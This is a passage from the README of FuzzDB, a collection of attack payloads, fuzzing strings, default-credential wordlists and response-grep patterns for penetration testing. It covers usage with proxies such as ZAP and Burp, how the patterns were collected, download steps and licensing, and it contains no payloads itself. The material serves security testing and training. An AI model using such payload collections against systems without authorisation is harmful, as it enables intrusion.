different languages, common password and username lists, and some handy wordlists. **Documentation -** Many directories contain a README.md file with usage notes. A collection of [documentation](https://github.com/fuzzdb-project/fuzzdb/tree/master/docs) from around the web that is helpful for using FuzzDB to construct test cases is also included. <br> ### Usage tips for pentesting with FuzzDB ### https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints ### How people use FuzzDB ### FuzzDB is like an application security scanner, without the scanner. Some ways to use FuzzDB: * Website and application service black-box penetration testing with * [OWASP Zap](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) proxy's FuzzDB Zap Extension * Burp Proxy's [intruder](http://portswigger.net/intruder/) tool and scanner * [PappyProxy](http://www.pappyproxy.com/), a console-based intercepting proxy * To identify interesting service responses using grep patterns for PII, credit card numbers, error messages, and more * Inside custom tools for testing software and application protocols * Crafting security test cases for GUI or command line software with standard test automation tools * Incorporating into other Open Source software or commercial products * In training materials and documentation * To learn about software exploitation techniques * To improve your security testing product or service ### How were the patterns collected? ### Many, many hours of research and pentesting. And * analysis of default app installs * analysis of system and application documentation * analysis of error messages * researching old web exploits for repeatable attack strings * scraping scanner payloads from http logs * various books, articles, blog posts, mailing list threads * other open source fuzzers and pentest tools and the input of contributors: https://github.com/fuzzdb-project/fuzzdb/graphs/contributors ### Places you can find FuzzDB ### Other security tools and projects that incorporate FuzzzDB in whole or part * OWASP Zap Proxy fuzzdb plugin https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project * SecLists https://github.com/danielmiessler/SecLists * TrustedSec Pentesters Framework https://github.com/trustedsec/ptf * Rapid7 Metasploit https://github.com/rapid7/metasploit-framework * Portswigger Burp Suite http://portswigger.net * Protofuzz https://github.com/trailofbits/protofuzz * BlackArch Linux https://www.blackarch.org/ * ArchStrike Linux https://archstrike.org/ ### Download ### **Preferred method is to check out sources via git, new payloads are added frequently** ``` git clone https://github.com/fuzzdb-project/fuzzdb.git --depth 1 ``` While in the FuzzDB dir, you can update your local repo with the command ``` git pull ``` This Stackoverflow gives ideas on how to keep a local repository tidy: https://stackoverflow.com/questions/38171899/how-to-reduce-the-depth-of-an-existing-git-clone/46004595#46004595 You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a fresh [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip) Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system. Use at your own risk. ### Who ### FuzzDB was created by Adam Muntner (amuntner @ gmail.com) FuzzDB (c) Copyright Adam Muntner, 2010-2019 Portions copyrighted by others, as noted in commit comments and README.md files. The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know. Submissions are always welcome! Official FuzzDB project page: [https://github.com/fuzzdb-project/fuzzdb/](https://github.com/fuzzdb-project/fuzzdb/)